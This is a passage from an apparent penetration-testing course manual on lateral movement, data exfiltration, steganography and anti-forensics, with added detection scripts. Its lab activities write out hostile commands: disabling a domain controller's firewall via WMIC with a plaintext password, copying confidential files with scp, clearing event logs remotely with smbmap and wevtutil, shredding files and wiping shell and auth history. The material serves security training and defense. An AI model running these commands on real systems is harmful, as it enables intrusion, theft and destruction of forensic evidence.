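    """Return the IPv4 active-route rows as dictionaries."""
    routes = []
    in_table = False
    for line in text.splitlines():
        if line.startswith("Network Destination"):
            in_table = True
            continue
        if not in_table:
            continue
        parts = line.split()
        if len(parts) != 5:       # separator line or end of section
            in_table = False
            continue
        dest, mask, gateway, iface, metric = parts
        routes.append({"dest": dest, "mask": mask, "gateway": gateway,
                       "iface": iface, "metric": int(metric)})
    return routes


def unexpected_routes(routes, baseline):
    """Rows whose (dest, mask, gateway) triple is absent from the baseline."""
    return [r for r in routes if (r["dest"], r["mask"], r["gateway"]) not in baseline]


if __name__ == "__main__":
    for r in unexpected_routes(parse_route_print(SAMPLE_ROUTE_PRINT), BASELINE):
        print(f"unexpected route {r['dest']}/{r['mask']} via {r['gateway']} metric {r['metric']}")
```

The baseline is the important part: a workstation's route table is small and stable, so a per-role baseline captured at build time turns "is this route normal?" into a set lookup, and the same approach works for the persistent-routes section and for Linux ip route output once a parser for that format is swapped in.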


Figure 5-12: An attacker routing traffic on a different subnet through a pivot host.
ACTIVITY 5-3
Assessing Lateral Movement and Pivoting Techniques

Before You Begin

You'll be using all three of your machines in this activity.

Scenario

Through your team's security efforts, attackers are often cut off at certain critical endpoints. However, your endpoints are still open to other "safe" hosts in the network. An attacker can take advantage of these hosts to pivot and move laterally to your more valuable targets. In this activity, you'll assess how pivoting can overcome certain security measures. Your Kali Linux VM cannot access your Windows Server machine directly anymore, but you'll take a different route to get to the domain controller—using the Windows 10 client as a pivot.

1. Prepare your Windows Server domain controller to reject all contact from your Kali Linux VM.
a) On your Windows Server machine, from Server Manager, select Tools→Windows Defender Firewall with Advanced Security.
b) From the console tree, select Inbound Rules.
c) From the Actions pane on the right, select New Rule.
d) In the New Inbound Rule Wizard, select the Custom radio button, and then select Next.
e) Select Next to accept the Program defaults, and select Next to accept the Protocols and Ports defaults.
f) On the Scope page, in the Which local IP addresses does this rule apply to? section, select the These IP addresses radio button and select Add.
g) In the IP Address dialog box, in the This IP address or subnet text box, enter your Windows Server's IP address and select OK.
h) In the Which remote IP addresses does this rule apply to? section, add your Kali Linux VM's IP address and then select Next.
i) On the Action page, select Block the connection and select Next.
j) On the Profile page, select Next to accept the defaults.
k) Name the rule No Kali Linux, and then select Finish.

2. Test the rule.
a) From your Kali Linux VM, ping your Windows Server.
The ping should fail.
b) Press Ctrl+C to stop the ping attempt.
c) From your Windows 10 client machine, ping your Windows Server.
The ping should succeed.

3. Using Kali Linux, perform reconnaissance on the server.
a) In a Kali Linux terminal, enter ssh Administrator@10.39.5.#, where # corresponds to your Windows 10 client's IP address.
Note: Make sure you're connecting to your Windows 10 client's IP address, and not the server. The client also has an OpenSSH server set up and is accepting domain credentials.
b) Enter yes to continue.
c) Enter the password.
d) At the prompt, enter echo %logonserver%
This command reveals the computer name of the domain controller that the Windows 10 domain member is connected to.
e) Verify that your domain controller's computer name is listed.
f) At the prompt, enter ping <computer name>, using the name you just enumerated.
g) Verify that you can see your server's IP address.
An attacker won't necessarily know the IP address of their target, so this helps them discover it.

Instructor note: If students mistype something in the SSH connection, they may need to execute the mistyped command and start over. Encourage them to type carefully.

4. Pivot from the client to the server.
a) In the Kali Linux terminal, enter the following command:
wmic /node:<IP address> /user:Administrator /password:Pa22w0rd process call create "cmd.exe /c netsh advfirewall set allprofiles state off"
Ensure that you're replacing <IP address> with the Windows Server IP address you matched previously.
This command uses WMIC to completely disable the firewall on the Windows Server domain controller.

Instructor note: If students are seeing an RPC server is unavailable error, ensure the Windows Firewall Remote Management rules are enabled on their Windows 10 client's firewall, as per the course setup.

b) Verify that WMIC returns "Method execution successful."
c) Press Ctrl+C to exit the SSH session.
d) At the terminal prompt, enter ping 10.39.5.#, where # corresponds to your Windows Server's IP
   address.
e) Verify that the ping succeeds.
   Your Windows Server domain controller is now vulnerable to direct compromise from your Kali Linux
   VM, among other security issues that come with an inactive firewall.
f) Press Ctrl+C to stop the ping.
5. Revert the DC's firewall back to its active state.
a) Return to your Windows Server machine.
b) Right-click the Start button and select Windows PowerShell (Admin).
c) At the prompt, enter netsh advfirewall set allprofiles state on
d) Enter netsh advfirewall firewall delete rule name="No Kali Linux"
e) Close PowerShell and any other open windows besides Server Manager.

TOPIC D
Assess Data Exfiltration Techniques
Access is not the be-all and end-all for many attackers. Rather, their ultimate goal is often to steal
sensitive data from the organization. In this topic, you'll assess how attackers can leak data out of
your organization even after you think the intrusion has been dealt with.

Data Exfiltration
Example CAPEC IDs: CAPEC-511 and CAPEC-537.

The unauthorized transfer of data from a system to one the attacker controls is called data
exfiltration. In a post-attack scenario, attackers are able to stay hidden on compromised systems even
after the main incident has concluded. Whether by lateral movement, pivoting, or any other APT
technique, the attacker gains access to private data that could put the organization in jeopardy if it
were captured by unauthorized users.

Although exfiltration can be largely mitigated through data loss prevention (DLP) solutions and strong
encryption of sensitive data, it may not always be feasible for an organization to ensure that every
potential point of data undergoes encryption. What's more, an attacker who gains access to
administrative or other privileged credentials may be able to decrypt that data without much further
effort. Another potential vulnerability concerns how the organization is encrypting their data: do they
encrypt data only at rest? If so, what's to prevent the attacker from capturing the unencrypted data as
it's in transit from a workstation to a remote database? Attackers have several stealthy approaches
available to them to take advantage of these opportunities.
Covert Channels
Data exfiltration procedures that use covert channels are able to transmit data outside the network
without alerting any intrusion detection or data loss countermeasures. The specific channel the
attacker takes will differ from situation to situation, but all covert channels share a common element:
they enable the stealthy transmission of data from node to node using means the organization's
security controls do not anticipate.
Examples of covert channels include the following:
• Transmitting data over a rarely used port that the firewall does not block.
• Concealing data in the headers of TCP/IP packets so as to evade signature analysis by IDSs.
• Breaking the data up into multiple packets to be sent at different times to evade signature analysis.
• Transmitting data over a shared resource that is not typically used as a communication channel
  (e.g., file system metadata).
• Transmitting encrypted data that cannot be inspected as it leaves the network.
Advanced IDSs may be able to detect some of this behavior, but in many cases, it's difficult for
automated systems to accurately account for all possible covert channels that an attacker could use.
It's not necessarily feasible for the organization to store and manually analyze all its outbound traffic
data, either.

Storage vs. Timing Channels
Covert channels can also be thought of in terms of two different categories: storage and timing. A
covert storage channel involves one process writing to a storage location (a file, a shared memory
region, an unused protocol header field) and another process reading from that location. A covert
timing channel involves one process modulating its use of a system resource so that changes in timing
or response time signal information to the recipient process. Some usages of covert channels combine
aspects of both storage and timing.
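The timing category is the harder one to picture, so the following Python script is added here as an example; it is not part of the course materials. It simulates a covert timing channel in which a sender encodes each bit of a message as the gap before the next otherwise-innocent packet (a short gap for 0, a long gap for 1), a receiver recovers the message from nothing but arrival timestamps, and a small detector flags the signature a defender can look for: inter-arrival times that cluster tightly around exactly two values, which real traffic rarely does. All timestamps are constructed in memory, nothing touches the network, and the two gap lengths are assumed values chosen for the demonstration.

```python
"""Covert timing channel: encode, decode, and detect. Added example, not
course code. Timestamps are simulated; the gap lengths are assumed values."""
import random
import statistics

SHORT_GAP = 0.05  # seconds between packets that encodes a 0 bit (assumed)
LONG_GAP = 0.20   # seconds between packets that encodes a 1 bit (assumed)


def encode_timing(message: bytes, start: float = 0.0) -> list:
    """Return packet arrival times whose gaps carry `message`, MSB first."""
    times = [start]
    now = start
    for byte in message:
        for i in range(7, -1, -1):
            now += LONG_GAP if (byte >> i) & 1 else SHORT_GAP
            times.append(now)
    return times


def decode_timing(times: list) -> bytes:
    """Recover the message from arrival times alone; no payload is inspected."""
    threshold = (SHORT_GAP + LONG_GAP) / 2
    bits = [1 if later - earlier > threshold else 0
            for earlier, later in zip(times, times[1:])]
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


def _tight(cluster: list, max_cv: float) -> bool:
    """True when the cluster's coefficient of variation (stdev/mean) is small."""
    mean = statistics.mean(cluster)
    return mean > 0 and statistics.pstdev(cluster) / mean < max_cv


def looks_like_timing_channel(times: list, min_packets: int = 32,
                              max_cv: float = 0.05) -> bool:
    """Heuristic detector for a two-symbol timing channel.

    Split the inter-arrival gaps at the midpoint between the smallest and the
    largest gap. Real traffic produces a broad, noisy spread; a timing channel
    produces two tight clusters whose centres are well separated.
    """
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    if len(gaps) < min_packets:
        return False
    midpoint = (min(gaps) + max(gaps)) / 2
    low = [g for g in gaps if g <= midpoint]
    high = [g for g in gaps if g > midpoint]
    if len(low) < 4 or len(high) < 4:
        return False
    return (_tight(low, max_cv) and _tight(high, max_cv)
            and statistics.mean(high) > 2 * statistics.mean(low))


def benign_timestamps(count: int = 200, mean_gap: float = 0.1,
                      seed: int = 1) -> list:
    """Constructed 'normal' traffic: exponentially distributed gaps, seeded
    so the result is reproducible."""
    rng = random.Random(seed)
    times = [0.0]
    for _ in range(count):
        times.append(times[-1] + rng.expovariate(1.0 / mean_gap))
    return times


if __name__ == "__main__":
    secret = b"DT_Watch"  # constructed stand-in for exfiltrated data
    covert = encode_timing(secret)
    print("decoded:", decode_timing(covert))
    print("covert flow flagged:", looks_like_timing_channel(covert))
    print("benign flow flagged:", looks_like_timing_channel(benign_timestamps()))
```

Two caveats worth keeping in mind when turning this into a real detector: a sender that adds random jitter to each gap, or uses more than two symbols, defeats the tight-cluster test, and a flow that never varies its gap (all zeros) carries no information and is correctly not flagged. Flow-level timing statistics are therefore a triage signal to combine with destination, volume, and host context, not proof on their own.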

Steganography
Similar to using a covert channel, one technique for hiding data for exfiltration is steganography.
Using steganography, an attacker might be able to evade intrusion detection and data loss
countermeasures if they hide information within images or video. Modern tools hide digital
information so well the human eye cannot tell the difference; likewise, computer programs not
equipped for steganographic analysis may also fail to spot the hidden information.
For example, data loss countermeasures may inspect all outgoing packets for any signatures that
match a database of known file signatures. If the attacker simply transmitted a sensitive document by
itself, the countermeasures would immediately identify that document and shut down the connection.
However, if the attacker embeds the sensitive document in a benign image, the data loss system may
let the transmission continue unabated. The system won't see a difference, and neither would an
administrator if they decide to inspect packets manually.
In this case, not only is the data exfiltrated, but the leakage goes undetected as well. If the attacker
finds success in steganography, they may be able to exfiltrate a great deal of data over a long period
of time. Even if the organization learns of the leak, they may not know where the leak is coming from
and how to plug it.

Figure 5-13: A document embedded in an image. Using steganography, the image appears no
different.
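To make the signature-evasion point concrete, the following Python script is an added example, not course code. It hides a payload in the least significant bit (LSB) of each byte of an image's pixel data, extracts it again, and then runs the kind of check a signature-based DLP filter performs: the ZIP magic bytes are found in the bare document but not in the stego image, even though every byte of the image moved by at most one. The cover image is a constructed gradient byte buffer standing in for decoded pixel values, so no image library is required; the payload and its length header format are likewise assumptions for the demonstration.

```python
"""LSB steganography: hide a document in pixel data and show why a
signature-based DLP check misses it. Added example, not course code.
The cover 'image' is a constructed gradient byte buffer standing in for
decoded pixel values, so no image library is required."""

ZIP_MAGIC = b"PK\x03\x04"  # first bytes of a ZIP archive such as DT_Watch.zip
HEADER_BITS = 32           # payload length is stored as a 32-bit big-endian prefix


def make_cover(size: int = 4096) -> bytes:
    """Constructed cover: a smooth 0..255 gradient, like a flat image region."""
    return bytes(i % 256 for i in range(size))


def _bits(data: bytes):
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed(cover: bytes, payload: bytes) -> bytes:
    """Write a length header plus payload into the LSB of successive bytes."""
    message = len(payload).to_bytes(4, "big") + payload
    if len(message) * 8 > len(cover):
        raise ValueError("cover holds %d payload bytes, got %d"
                         % (len(cover) // 8 - 4, len(payload)))
    stego = bytearray(cover)
    for index, bit in enumerate(_bits(message)):
        stego[index] = (stego[index] & 0xFE) | bit  # touch only the low bit
    return bytes(stego)


def _read(stego: bytes, start_bit: int, count: int) -> bytes:
    out = bytearray()
    for b in range(count):
        byte = 0
        for i in range(8):
            byte = (byte << 1) | (stego[start_bit + b * 8 + i] & 1)
        out.append(byte)
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the length header, then exactly that many payload bytes."""
    length = int.from_bytes(_read(stego, 0, 4), "big")
    return _read(stego, HEADER_BITS, length)


def max_pixel_delta(cover: bytes, stego: bytes) -> int:
    """How much any byte changed; LSB embedding moves each by at most 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def has_signature(buf: bytes, magic: bytes = ZIP_MAGIC) -> bool:
    """The kind of check a signature-based DLP filter performs."""
    return magic in buf


if __name__ == "__main__":
    document = ZIP_MAGIC + b"DT_Watch schematics (constructed payload)"
    cover = make_cover()
    stego = embed(cover, document)
    print("recovered:", extract(stego) == document)
    print("max byte change:", max_pixel_delta(cover, stego))
    print("DLP sees bare document:", has_signature(document))
    print("DLP sees stego image:", has_signature(stego))
```

The defensive takeaway is that content signatures cannot see a payload spread one bit at a time across thousands of pixels; detection has to come from statistics on the LSB plane, from comparing the outbound image against a known original, or from policy that treats bulk image uploads from a sensitive host as suspicious in their own right.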

File Sharing Services
The proliferation of file sharing services such as Dropbox™ and OneDrive® makes it difficult for
organizations to outright block sensitive files from leaving the network. Ideally, sensitive files would
stay within the organization's perimeter at all times, but users' desire for convenience and portability
often outweighs this ideal. If an employee works from home and needs to share important financial
data with another offsite employee, they may turn to a file sharing service with the assumption that it
is access controlled and reasonably secure from intrusion. This may be true, but the more the
organization allows file sharing with external cloud services, the more channels they open up that an
attacker can use to exfiltrate critical information.
Rather than spend time and effort looking for a covert channel, an attacker could open a connection to
any of the cloud providers the organization uses to share files. If the data loss systems detect a
sensitive file outbound for Dropbox, for example, they may allow it to pass. Those systems won't
necessarily be able to discern legitimate from illegitimate use of a single file. So an attacker doesn't
even need to have access to the employees' official Dropbox share: the attacker can open their own
share, drop the files in, and then the data is leaked.

ACTIVITY 5-4
Assessing Data Exfiltration

Data File
C:\CNX0013Data\Analyzing Post-Attack Techniques\DT_Watch.zip

Before You Begin
You'll be using both your Kali Linux VM and your Windows Server in this activity.

Scenario
Now that you've identified how an attacker can compromise your Windows Server, you'll want to see
how easily the attacker can pull information off that server. This server stores information about a
new technology that Develetech is working on: a smartwatch. You'll exfiltrate an archive containing
sensitive smartwatch files from the server onto your attack machine. In a real attack, the attacker
would then be able to make off with the data and leak it to the public, sell it to a competitor, or
engage in other behavior that could undermine Develetech's brand.

1. Prepare your Windows Server with the sensitive data.
a) On your Windows Server, create a directory at C:\ called CurrentProjects.
b) Extract the DT_Watch.zip file to C:\CurrentProjects.

2. Gain remote access to the server and search for the sensitive data.
a) On your Kali Linux VM, right-click the desktop and select Create Folder.
b) Name the folder Loot and select Create.
c) Open a terminal and enter ssh Administrator@10.39.5.#, where # corresponds to your server's IP
   address.
d) Enter the password you discovered earlier: Pa22w0rd
e) At the prompt, enter dir to list the contents of the default directory.
f) Enter cd C:\ to navigate to the root directory.
g) List the root directory's contents. Verify that there's a CurrentProjects folder.
h) Navigate to this CurrentProjects folder.
i) Navigate to the DT_Watch folder and list its contents.
   From an attacker's perspective, this has a lot of company confidential information that they could
   make use of.

3. Review the SCP protocol.
a) Open a new terminal window in Kali Linux.
b) Enter man scp and review the details of this command.
   The secure copy (SCP) protocol runs over SSH and transfers files between hosts on a network using
   the same authentication and encryption as an SSH session. The format for using SCP to download a
   file from a remote host is scp [options] [user@]host:path local_path

4. Rather than copying each file individually, you'll transfer the entire directory at once. What is the
   flag to download a directory recursively?
   A: -r

5. Transfer the DT_Watch directory to your attack machine.
a) Return to your SSH terminal.
b) Press Ctrl+C to close the SSH session.
c) Enter the following command on a single line:
   scp -r Administrator@10.39.5.#:c:/CurrentProjects/DT_Watch /home/kali/Desktop/Loot

Instructor note: Ensure that students are putting a space between the remote path (Windows) and the
local path (Linux).
d) Enter the password.
   This transfers the entire DT_Watch directory to the Loot directory on your Kali Linux VM. The
   download should take only a few moments.
e) Navigate to the Loot directory in Kali Linux and verify that all the files are there.

6. How could an administrator prevent this exfiltration?
   A: Answers may vary, but they could disable SSH access on the server, block remote access ports
   on the firewall, or implement an IDS/IPS or data loss prevention (DLP) software to monitor
   sensitive file movement.
   Note that because SCP rides on SSH, the transfer is encrypted end to end. A network DLP sensor
   cannot read the file contents, so monitoring has to work from connection metadata (source
   address, account, volume, and timing) or from host-based controls on the server itself.
7. What other methods could an attacker use to remove data from the organization?
   A: Answers may vary, but could include: physically connecting removable media to the server;
   exfiltrating over FTP/S; exfiltrating over HTTP/S; using Netcat as a backdoor to read and write
   files over the network; and more.

8. Close all open windows in Kali Linux.
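The mitigations above all hinge on noticing the connection in the first place. What the server does record, in the sshd entries that the next activity has you wipe from the Application log, is who connected, from where, by which method, and how often. The following Python script is an added example, not course code: it parses a handful of constructed sshd log lines in OpenSSH's standard wording and raises the alerts a first responder would want, namely a login from a host that is not an approved jump host, an administrative account authenticating with a password, and a burst of failed logins from one source. The allowlist, the 10.39.5.200 attacker address, and the thresholds are assumptions for the demonstration.

```python
"""Review sshd log lines for exfiltration precursors. Added example, not
course code; the log lines, allowlist and thresholds are constructed."""
import re
from collections import Counter

# Standard OpenSSH wording. The "sshd[pid]:" prefix is not anchored, so the
# same pattern fits syslog lines and Windows Application-log message bodies.
ACCEPTED = re.compile(
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>[\d.]+) port (?P<port>\d+)")
FAILED = re.compile(
    r"Failed (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port (?P<port>\d+)")

PRIVILEGED = {"administrator", "root"}


def parse_sshd_line(line: str):
    """Return a dict describing a login attempt, or None for other lines."""
    for outcome, pattern in (("accepted", ACCEPTED), ("failed", FAILED)):
        match = pattern.search(line)
        if match:
            event = match.groupdict()
            event["outcome"] = outcome
            event["port"] = int(event["port"])
            return event
    return None


def review(lines, allowed_sources, failure_threshold=3):
    """Return a list of (rule, detail) alerts for the given log lines."""
    alerts = []
    failures = Counter()
    for line in lines:
        event = parse_sshd_line(line)
        if event is None:
            continue
        who = "%s@%s" % (event["user"], event["src"])
        if event["outcome"] == "failed":
            failures[event["src"]] += 1
            continue
        if event["src"] not in allowed_sources:
            alerts.append(("login-from-unapproved-source", who))
        if event["user"].lower() in PRIVILEGED and event["method"] == "password":
            alerts.append(("privileged-password-login", who))
    for src, count in failures.items():
        if count >= failure_threshold:
            alerts.append(("failed-login-burst", "%s (%d failures)" % (src, count)))
    return alerts


# Constructed sample: an approved jump host, then the attacker's Kali VM.
SAMPLE_LOG = [
    "sshd[1201]: Accepted publickey for svc-backup from 10.39.5.10 port 50112 ssh2",
    "sshd[1340]: Failed password for Administrator from 10.39.5.200 port 41002 ssh2",
    "sshd[1340]: Failed password for Administrator from 10.39.5.200 port 41002 ssh2",
    "sshd[1340]: Failed password for invalid user admin from 10.39.5.200 port 41004 ssh2",
    "sshd[1402]: Accepted password for Administrator from 10.39.5.200 port 41010 ssh2",
    "sshd[1402]: Disconnected from user Administrator 10.39.5.200 port 41010",
]
APPROVED_JUMP_HOSTS = {"10.39.5.10"}  # assumed allowlist

if __name__ == "__main__":
    for rule, detail in review(SAMPLE_LOG, APPROVED_JUMP_HOSTS):
        print("%-32s %s" % (rule, detail))
```

Run against the sample, the script raises three alerts, all pointing at the same source: the Administrator login from an unapproved host, the use of a password for a privileged account, and the preceding burst of failures. Because the attacker's first move after exfiltration is to clear this very log, the lines should be forwarded to a collector the server's administrator cannot truncate, so the review runs on a copy the attacker never reaches.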

TOPIC E
Assess Anti-Forensics Techniques
In this topic, you'll assess how post-attack threats will attempt to disrupt the organization's forensic
investigations.

Anti-Forensics
Instructor note: Inform students that forensics will be discussed at the end of the course.

In the realm of cybersecurity, anti-forensics is the process by which an attacker disrupts or impedes a
forensic investigation. The attacker can do this by:
• Negatively affecting the quality, quantity, or integrity of evidence.
• Making forensic analysis more difficult or impossible.
• Deceiving forensic investigators.
Since the purpose of forensics is to discover who did something and how, the attacker will likely have
one or more of the following reasons for disrupting that process:
• To escape notice while they are still inside the perimeter.
• To eliminate themselves as a suspect after they have concluded the attack.
• To frame another person or group as suspects.
• To waste the organization's time and resources.
The anti-forensics process relies on weaknesses inherent in computer systems, forensic tools, and the
human investigators themselves. There are several techniques available to the attacker that can exploit
these weaknesses.

Golden Ticket and Anti-Forensics
Logon and logoff events in the Windows event log are usually recorded with the user name and
domain name of the account. However, for some time, many forged Kerberos tickets would include a
static or otherwise anomalous entry in the domain name field. This made it easy for investigators to
detect a golden ticket, as any logon events that showed an invalid domain would likely point to an
attack on Kerberos.
However, newer golden ticket generators have corrected this oversight and are now able to populate
the ticket with less-anomalous information in the domain field. For example, the ticket may instead
use the domain's real NetBIOS name, and any automated forensic systems that evaluate domain logons
may fail to catch this new behavior. This can make it difficult for the forensic investigator to piece
together a narrative of events that led to the domain controller being compromised.

Figure 5-14: On the left, the logon event is recorded with an invalid domain name. On the right, the
logon event is recorded with the correct NetBIOS name.

Buffer Overflows
The attacker can target the forensic investigator more directly by triggering a buffer overflow in the
investigator's tools during analysis. If the attacker leaves behind files in the wake of an attack, they
can effectively set a trap for the investigator. When the investigator goes to view or run the evidence
they've gathered, one or more of those files can trigger a DoS condition by causing the investigative
software to hang or crash. In fact, the malicious file(s) could be crafted in such a way that they always
trigger a buffer overflow, so the investigator has no hope of actually analyzing the evidence. Even if
the investigator decides to move on to analyzing a more benign file, they won't necessarily be able to
avoid triggering more buffer overflows in unpredictable files. This can be frustrating and lead to lost
time and productivity.
The following are two examples of how an attacker can cause a forensic tool to overflow:
• The attacker creates an infinite loop in memory by crafting a document file that exploits
  vulnerable dynamic-link libraries (DLLs).
• The attacker can execute a heap spraying attack through bitmap files. Heap spraying complements a
  buffer overflow: the attacker fills large regions of the application's memory heap with copies of
  malicious code so that a later memory corruption is likely to land on it. The bitmap file, when
  opened in the forensic application, may force the application to read memory from the sprayed
  heap, executing the malicious code.
Most popular forensic tools have kept up with these vulnerabilities and have issued security fixes to
mitigate buffer overflow attacks. However, attackers may still be able to exploit forensic toolkits the
investigator fails to keep up to date. Parsing evidence inside an isolated analysis VM, with the tools
patched and a snapshot taken before each session, limits what such a booby-trapped file can do.

Memory Residents
A piece of malware that resides in memory can be identified by the operating system as a memory
resident: that is, the OS is not allowed to swap this memory to permanent storage as it does during
normal execution. Most memory residents are critical OS files or often-used programs that need to
load quickly by taking advantage of RAM's speed, though these techniques are less common in
modern operating systems. Malicious software, particularly viruses, may run as memory residents to
stay active even while the application it is normally attached to is no longer running. This makes
them a particularly insidious form of malware.
In an anti-forensics application, memory resident malware may fool an investigator or their automated
tools into believing a computer has no trace of malware. If no overt malicious application is running,
and no files in storage match malicious signatures, then a malware identification program may give
the all clear. However, the infection may still remain in memory, ready to execute if certain conditions
are met (like the OS finishing loading). Some modern forensic tools, however, are able to scan a
computer's memory to detect anomalies, which is one reason to capture volatile memory before
powering a suspect system down.

Program Packers
Example CVE ID: CVE-2015-1462.
Example CAPEC ID: CAPEC-570.

A program packer is a method of compression in which an executable is mostly compressed. The part
that isn't compressed includes code to decompress the executable. This all combines into a single
executable that, when executed, begins to decompress the entire code before that code actually runs.
In this sense, a packed program is a type of self-extracting archive. There are two main advantages to
program packing: reducing file size, and increasing the difficulty of reverse engineering the file's
contents. Organizations or individuals who share proprietary software may use program packing to
deter theft of intellectual property and violations of copyright.
However, this is also something an attacker can use to their advantage. Packing malware makes it
more difficult to detect and analyze for many anti-malware solutions. They often compensate by
identifying all packed programs as malware, but this complicates the matter with false positives. For a
forensic analyst, it may be difficult to accurately mark an executable as a maliciously packed program
without some serious effort to reverse engineer it. This is because packed malware, until it's unpacked,
can mask string literals and effectively modify its signatures to avoid triggering signature-based
scanners. This can waste the analyst's time and resources. However, an analyst can work around this
by unpacking the executable in a controlled sandbox environment.

VM and Sandbox Detection
A particularly clever anti-forensics technique involves malware detecting when it is being run inside a
virtual machine (VM). VMs are used by malware analysts to create a sandbox environment. A sandbox
environment is an ad hoc, isolated environment that enables forensic analysts to examine malware
without jeopardizing the actual live environment the VM is running on. Aside from manual analysis,
personnel also use these environments to run automated malware analysis tools.
Malware is able to detect that it is running in a sandbox usually using one of the following methods:
• Detecting direct hooks into the application. Sandboxes hook into programs in order to monitor the
  calls they make to system libraries. A malicious application may be able to detect these hooks.
• Exploiting unpatched zero-day vulnerabilities in the sandbox's software.
• Looking for artifacts of the hypervisor itself, such as vendor strings in hardware identifiers or the
  presence of well-known virtual device drivers.
If malware detects it is running in a sandbox, it can respond in a number of ways to hide its presence:
• It can stay dormant, only to wake on the system once it detects usage patterns likely produced by a
  person and not a machine. For example, an automated sandbox is unlikely to move the mouse, so
  the malware may be written to activate only upon mouse movement.
• It may also be able to run trivial computations for some time to fool the sandbox into thinking it's
  benign, at which point it will execute the malicious part of the code.
• If it detects direct hooks, malware may also be able to obfuscate its presence by only exhibiting
  malicious behavior between system calls.
Note that, because VMs are ubiquitous in production environments these days, sandbox detection is
not as useful to malware authors as it once was. Most competent malware authors assume their code
will run in virtualized environments that aren't explicitly set up to analyze malware.

Covering Tracks
Once an attacker has completed their attack, they'll often attempt to disrupt the forensic process as
they leave the target network and systems. Their aim is to make it as difficult as possible for forensic
investigators to identify how the attack commenced, and who is responsible. There are many ways in
which an attacker can cover their tracks, including:
• Clearing event logs with an exploit program. Tools like Metasploit include commands for clearing
  an entire event log on a machine that the attacker is currently exploiting. Because it clears every
  log rather than specific ones, this may raise suspicion; however, it can still make it harder for a
  forensic analyst to do their job.
• Clearing discrete event log entries. Rather than wiping a log entirely and giving investigators
  something to be suspicious about, attackers may remove specific entries that could reveal their
  attack. For example, an attacker with access to the Linux syslog can delete specific entries while
  leaving the log itself intact.
• Changing event log entries. Rather than directly removing an entry or an entire log, it may be
  more beneficial to the attacker to simply alter entries. For example, altering a user logon entry in
  Windows security logs may enable the attacker to frame another individual.
• Erasing command-line history. Certain shells, like Bash on Linux, store the last n commands in
  history. A forensic analyst can retrieve this history and piece together the attacker's executed
  commands. However, the attacker can cover their tracks by setting the command history size to
  zero before executing their commands. For Bash and similar shells, this command is
  export HISTSIZE=0 (running unset HISTFILE has a similar effect, since the shell then has no file to
  write its history to when it exits).
• Shredding files or erasing data securely. Since simply deleting a file using standard OS features
  won't erase that file securely, attackers may resort to data wiping techniques to prevent forensic
  investigators from recovering the incriminating information. On Linux systems, this is known as
  shredding, because the shred command can overwrite files on storage to ensure complete removal.
  Note that shred is only reliable on file systems that overwrite data in place; on journaled or
  copy-on-write file systems and on flash storage, the old contents may survive elsewhere on the
  device.
• Using any of the previously mentioned anti-forensics techniques. These techniques cannot only
  hide an attacker while they still reside in the network, but the techniques also may be able to help
  the attacker cover their tracks as they exit.

Figure 5-15: Disabling shell history and shredding an exploit file.

ATT&CK
The MITRE Corporation's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™)
model addresses the post-attack techniques discussed in this lesson, and more. This freely available
resource tags each specific technique with a unique ID, places each technique under one or more
tactics (the adversary's goal at that stage, e.g., Lateral Movement, Exfiltration, or Defense Evasion),
and then describes each technique on a technical level, along with detection guidance and mitigations.
ATT&CK is available at https://attack.mitre.org.

ACTIVITY 5-5
Assessing Anti-Forensics Techniques

Before You Begin
You'll be using all three of your machines in this activity.

Scenario
Now that you've explored the possibility of an attacker exfiltrating sensitive data from your systems,
you need to consider that such an attack won't be so easy to detect. Attackers cover their tracks to
remove evidence that could implicate them in the attack, and they also seek to hide the attack's
existence altogether. In this activity, you'll play the attacker attempting to wipe all traces of data
exfiltration. You'll remove event logs on the target server that could implicate the source and vector
of the attack. Also, consider that the attacker may not have direct physical access to the attack
machine; they may have compromised an organization's machine to use as a launching point for
exploitation. So, you'll also erase evidence on the Kali Linux VM that could indicate a malicious data
transfer took place.

Instructor note: It's important not to delete the Security log in this activity, as students will be
reviewing it in a later lesson.

1. Verify the traces of your exfiltration attack.
a) On your Windows Server, in Server Manager, select Tools→Event Viewer.
b) In the navigation pane, expand Windows Logs and select Application.
c) In the list of entries, verify that there are several entries with the source sshd.
   These entries are created every time an SSH connection is initiated. The details pane even reveals
   the source of the connection. You'll be clearing this log to hide evidence of your Kali Linux VM's IP
   address connecting to the server over SSH.
d) Close Event Viewer.

2. Clear the server's Application log remotely.
a) Switch to your Kali Linux VM and open a terminal.
b) At the terminal, enter the following command on a single line:
   smbmap -d DEVELETECH -u Administrator -p Pa22w0rd -H 10.39.5.# -x 'wevtutil cl Application'
   Note: Remember to substitute your server's IP address for 10.39.5.#.
   The Linux-based smbmap utility is primarily designed to enumerate network shares, but it can also
   execute remote commands on a Windows host. The wevtutil command clears the event log
   specified; in this case, the Application log.
   The prompt should return if there were no errors in execution.
   Clearing a log is itself logged: Windows records that the Application log was cleared as event ID
   104 (source Microsoft-Windows-Eventlog) in the System log, and clearing the Security log produces
   event ID 1102 in the Security log. An investigator who checks for those events will know a log was
   wiped, even if they can no longer see what it contained.
c) Switch to your Windows Server, open Event Viewer, and verify that the Application log is completely
   blank.
d) Close Event Viewer.

3. Securely delete the data you exfiltrated to your Kali Linux VM.
a) On Kali Linux, enter the following command on a single line:
   find /home/kali/Desktop/Loot -type f -exec shred -z -u {} \;
   The shred command works only on files, so you need to pair it with find and the -exec option to
   execute shred on all files in the specified directory. As for the shred command itself, the -u option
   removes the files after they've been overwritten, and the -z flag does a final overwrite pass with
   zeros to hide the fact that shredding took place.
b) Enter rm -r /home/kali/Desktop/Loot
   This command removes the directory.
c) Verify that the Loot directory and its contents are gone.

4. Clear the login and command execution history on your Kali Linux VM.
a) At the Kali Linux terminal, enter sudo bash -c "echo '' > /var/log/auth.log"
   This clears the Authentication log so the attacker's login information isn't recorded for a forensic
   investigator to analyze.
b) Enter echo "" > ~/.zsh_history
   This clears the file that records the user's history of entering commands into the Z shell, the default
   shell in Kali Linux.
c) Enter kill -9 $$
   This kills the current shell session, so it won't return you to a prompt. The -9 option sends a kill
   signal that cannot be blocked, and the $$ refers to the process ID of the current shell. Because the
   shell is killed rather than exiting normally, it never gets the chance to write the commands still held
